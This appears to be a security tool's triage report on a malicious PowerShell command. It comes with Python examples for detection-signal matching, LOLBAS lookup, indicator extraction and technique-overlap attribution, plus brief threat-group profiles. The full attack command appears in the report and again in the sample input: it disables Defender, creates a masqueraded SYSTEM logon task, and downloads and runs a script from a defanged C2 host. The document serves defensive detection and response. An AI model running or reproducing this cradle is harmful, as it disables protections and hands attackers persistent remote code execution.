Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader, Defense Evasion.
powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; schtasks /create /tn 'WindowsSecurityHealth' /tr 'powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('hxxp://c2.telemetry-svc[.]com/agent.ps1'))' /sc onlogon /ru SYSTEM /f"
Disables Windows Defender real-time protection (Set-MpPreference -DisableRealtimeMonitoring $true), then registers a scheduled task named 'WindowsSecurityHealth' (a name chosen to look like a Windows component) that runs as SYSTEM at every logon and overwrites any existing task of that name (/f). Each time it fires, the task starts a hidden PowerShell with the execution policy bypassed, downloads agent.ps1 from `c2.telemetry-svc[.]com` (shown defanged) and executes it in memory via IEX, so the cradle itself writes no payload to disk.
The command leverages Powershell.exe and Schtasks.exe, native Windows binaries routinely abused in living-off-the-land attacks; Schtasks.exe is catalogued in LOLBAS under the Execute abuse category. The `/sc onlogon` token is the schtasks schedule switch, not an invocation of Sc.exe, so Sc.exe and its ADS abuse category do not apply to this command.
1 network indicator was extracted (0 IPs, 1 URL: hxxp://c2.telemetry-svc[.]com/agent.ps1, defanged); it returned no hits across the queried threat-intelligence sources. A clean lookup does not make the domain benign: the name imitates a telemetry service, and the verdict rests on the observed behavior rather than on reputation.
The combination of high-confidence threat behavior, known-abused binary usage, and a hidden-window remote download-and-execute cradle strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment: re-enable Defender real-time protection, remove the 'WindowsSecurityHealth' scheduled task, block the `c2.telemetry-svc[.]com` domain, and preserve the host for investigation.
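The triage logic behind the verdict, signal categories, LOLBAS lookup and indicator extraction above, written out as an added example (this is not the analysis tool's own code). The signal patterns, the verdict thresholds, the small LOLBAS subset and the sample command lines are this example's assumptions; the command line itself is the one quoted in the report, kept defanged.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the command line from the verdict above, with the URL
# left defanged exactly as the report shows it.
SAMPLE_CMD = (
    "powershell.exe -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true; "
    "schtasks /create /tn 'WindowsSecurityHealth' /tr 'powershell -w hidden -ep bypass -c "
    "IEX((New-Object Net.WebClient).DownloadString('hxxp://c2.telemetry-svc[.]com/agent.ps1'))' "
    "/sc onlogon /ru SYSTEM /f\""
)

# Behavioural signal rules (name, category, pattern). The categories follow the
# report's own labels; the patterns and thresholds are this example's assumptions.
SIGNALS = [
    ("defender_realtime_off", "Defense Evasion",
     r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true"),
    ("execution_policy_bypass", "Defense Evasion", r"-(?:ep|ExecutionPolicy)\s+bypass"),
    ("hidden_window", "Defense Evasion", r"-(?:w|WindowStyle)\s+hidden"),
    ("download_cradle", "Loader", r"\bIEX\s*\(.*DownloadString\s*\("),
    ("task_runs_as_system", "Dropper", r"schtasks\s+/create\b.*/ru\s+SYSTEM\b"),
    ("task_on_logon", "Dropper", r"/sc\s+onlogon\b"),
]

# Assumed subset of the LOLBAS catalogue (binary -> listed abuse categories), for
# illustration only; check lolbas-project.github.io for the authoritative entries.
LOLBAS = {
    "schtasks": ["Execute"],
    "sc": ["ADS", "Execute"],
    "mshta": ["Execute"],
}

# A binary name counts only as a whole token, optionally followed by ".exe", and never
# when it directly follows "/", "-", "." or another word character. That keeps the
# schtasks "/sc" schedule switch from being reported as Sc.exe.
EXE_TOKEN = re.compile(r"(?<![\w/.\-])([A-Za-z]+)(?:\.exe)?(?![\w.])")

# Accept both live and defanged (hxxp, [.]) URLs so report output can be fed back in.
URL = re.compile(r"\b(?:hxxps?|https?)://[^\s'\"<>()]+", re.IGNORECASE)
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its live form."""
    return re.sub(r"hxxp", "http", ioc, flags=re.IGNORECASE).replace("[.]", ".")


def extract_indicators(cmd: str) -> dict:
    """Pull URLs out of a command line and split their hosts into IPs and domains."""
    urls = [refang(m.group(0)) for m in URL.finditer(cmd)]
    hosts = [h for h in (urlparse(u).hostname for u in urls) if h]
    return {
        "urls": urls,
        "ips": [h for h in hosts if IPV4.fullmatch(h)],
        "domains": [h for h in hosts if not IPV4.fullmatch(h)],
    }


def triage(cmd: str) -> dict:
    """Score one command line the way the report above does."""
    hits = [(name, cat) for name, cat, pat in SIGNALS if re.search(pat, cmd, re.IGNORECASE)]
    categories = sorted({cat for _, cat in hits})
    tokens = {t.lower() for t in EXE_TOKEN.findall(cmd)}
    lolbas = {b: LOLBAS[b] for b in sorted(tokens) if b in LOLBAS}
    # Assumed verdict thresholds: several signals spanning more than one category
    # is "Malicious"; any single signal is "Suspicious".
    if len(hits) >= 3 and len(categories) >= 2:
        verdict = "Malicious"
    elif hits:
        verdict = "Suspicious"
    else:
        verdict = "No attack signals"
    return {
        "verdict": verdict,
        "signals": [name for name, _ in hits],
        "categories": categories,
        "lolbas": lolbas,
        "indicators": extract_indicators(cmd),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_CMD), indent=2))
```

Running `triage(SAMPLE_CMD)` reports all six signals across the three categories named in the verdict, lists Schtasks.exe as the only catalogued binary (the `/sc` switch is not mistaken for Sc.exe), and returns one refanged URL with zero IPs. The same function applied to a benign `schtasks /query` produces no signals, which is the check to run before trusting any new rule.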
All indicators appear clean across queried sources.
Iranian group targeting aerospace, energy, and petrochemical industries. Associated with destructive Shamoon malware variants and password spraying campaigns.
Russia-based cybercriminal group operating TrickBot, Ryuk, Conti, and BazarLoader. One of the most prolific ransomware operators targeting hospitals and critical infrastructure.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.
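How a technique-overlap ranking of the kind described above can be computed, as an added example (not the tool's own attribution logic). The ATT&CK IDs for the observed command are this example's mapping of the behaviors in the report; the four candidate profiles are constructed placeholders, not the technique sets of any real group, and the confidence thresholds are assumptions. Techniques are weighted by how few candidates use them, so a match on PowerShell alone contributes far less than a match on a rarely seen sub-technique; this is why overlap depth alone is not attribution.

```python
from collections import Counter

# ATT&CK techniques evidenced by the command line in this report (mapping is this
# example's assumption): PowerShell, Disable or Modify Tools, Scheduled Task,
# Ingress Tool Transfer, Hidden Window, Masquerade Task or Service.
OBSERVED = {"T1059.001", "T1562.001", "T1053.005", "T1105", "T1564.003", "T1036.004"}

# Constructed candidate profiles. Placeholder technique sets used only to show the
# scoring; they do not describe any real threat group.
PROFILES = {
    "group-A": {"T1059.001", "T1562.001", "T1053.005", "T1105", "T1564.003",
                "T1036.004", "T1110.003"},
    "group-B": {"T1059.001", "T1053.005", "T1105", "T1486", "T1021.002"},
    "group-C": {"T1059.001", "T1105", "T1566.001", "T1003.001"},
    "group-D": {"T1059.001", "T1485", "T1561.002", "T1210"},
}


def technique_weights(profiles):
    """Return a weight function: 1 / (number of profiles using the technique).
    A technique every candidate uses is worth 1/N; one nobody else uses is worth 1."""
    df = Counter(t for techs in profiles.values() for t in techs)
    return lambda t: 1.0 / max(df[t], 1)


def rank_attribution(observed, profiles, high=0.8, medium=0.4):
    """Rank candidate profiles by weighted share of the observed techniques they cover.
    'depth' is the raw number of matching techniques; 'confidence' is the weighted share."""
    weight = technique_weights(profiles)
    total = sum(weight(t) for t in observed)
    results = []
    for name, techs in profiles.items():
        matched = observed & techs
        confidence = sum(weight(t) for t in matched) / total if total else 0.0
        label = "high" if confidence >= high else "medium" if confidence >= medium else "low"
        results.append({
            "group": name,
            "depth": len(matched),
            "matched": sorted(matched),
            "confidence": confidence,
            "label": label,
        })
    results.sort(key=lambda r: (-r["confidence"], r["group"]))
    return results


if __name__ == "__main__":
    for row in rank_attribution(OBSERVED, PROFILES):
        print(f"{row['group']}: depth={row['depth']} "
              f"confidence={row['confidence']:.2f} ({row['label']})")
```

With these constructed profiles, group-B matches three of the six observed techniques but all three are widely shared, so it lands in the "low" band; only a profile that also covers the distinctive ones (disabling Defender, the hidden window, the masquerading task name) reaches "high". Even that result says the TTPs overlap, not who ran the command.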